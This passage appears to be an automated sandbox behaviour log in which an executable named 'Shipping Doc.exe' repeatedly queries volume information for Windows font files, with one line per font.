Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
